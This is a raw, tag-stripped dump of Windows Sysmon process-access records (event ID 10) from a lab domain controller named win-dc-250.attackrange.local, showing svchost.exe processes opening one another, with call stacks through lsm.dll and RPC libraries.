13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.279{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.279{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.264{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 